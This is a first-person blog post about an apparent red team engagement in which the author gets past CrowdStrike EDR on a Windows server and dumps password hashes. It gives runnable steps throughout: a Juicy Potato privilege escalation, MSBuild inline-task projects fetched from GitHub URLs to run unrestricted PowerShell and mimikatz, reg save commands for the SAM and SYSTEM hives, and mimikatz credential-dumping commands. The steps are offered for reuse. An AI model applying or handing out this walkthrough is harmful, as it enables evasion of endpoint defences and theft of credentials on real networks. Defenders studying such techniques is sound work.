How I Bypassed Crowdstrike Restriction
Crowdstrike is a set of advanced EDR (endpoint detection and response) applications and techniques to provide an industry-leading NGAV (next generation anti-virus) offering machine learning to ensure breaches are stopped before they occur, Crowdstrike monitors processes running on OS by hooking, so if we run any malicious process on a machine it will monitor and log it, this all happens at in kernel level.
In this post, I am going to explain how i managed to bypass crowdstrike EDR and dump hashes executing mimiketz in crowdstrike network,
In my recent red teaming assessment, I got foothold on web application with limited user access (IIS user) running on windows server 2012 R2, so my first task was to do privilege escalation and get local admin privileges.
for this, I ran juicy potato exploit (a FUD by Anurag Srivastava, thanks!) and created a user with admin privileges
Later, i tried to dump lsass so i could get other user hash using procdump but crowdstrike blocked procdump categorizing as malicious behavior… hmmm…
I tried all known techniques to dump lsass but failed. Sigh!
My googling skills came to rescue as I luckily found some interesting writeups and scripts but best and most trusted script i found is by: — Casey Smith, Twitter: @subTee
https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj
To run this script, save it in any directory with write permission, execute and behold the magic ;
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
I was able to run PowerShell without restriction and crowdstrike sleeping. My next task was to dump hashes and perform the post exploitation.
I knew this technique will work in this scenario, so I downloaded one more script also written by Casey Smith.
https://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20mimikatz.xml
As before, save the script in any writable directory and run the below command.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe mimiketz.xml
Voila! I got mimiketz shell :P with crowdstrike & symantec still sleeping, time to dump passwords.
mimiketz # privilege::debug
sekurlsa::logonpasswords
I then started to dump hash but no luck as I got error due crowdstrike hooking to the lsass process and not allowing me to dump, so i started testing another way to dump, dump offline
For this, I needed to extract and copy the SYSTEM and SAM registry hives for the local machine.
reg save HKLM\SYSTEM SystemBkup.hiv
reg save HKLM\SAM SamBkup.hiv
mimikatz # privilege::debug
mimikatz # token::whoami
If you’re not system or using an impersonated system token, you'll have access denied error:
mimikatz # token::elevate
I then ran “log hash.txt” so that the next command outputs to a txt file.
mimikatz::log hash.txt
Then ran the “lsadump::sam SystemBkup.hiv SamBkup.hiv” to display the username and hashes for all local users.
mimikatz::lsadump::sam SystemBkup.hiv SamBkup.hiv
And see the magic ;) all output saves on hash.txt
Special mentions: — Manish Tanwar, Anurag Srivastava and Casey Smith
Happy Hacking ;)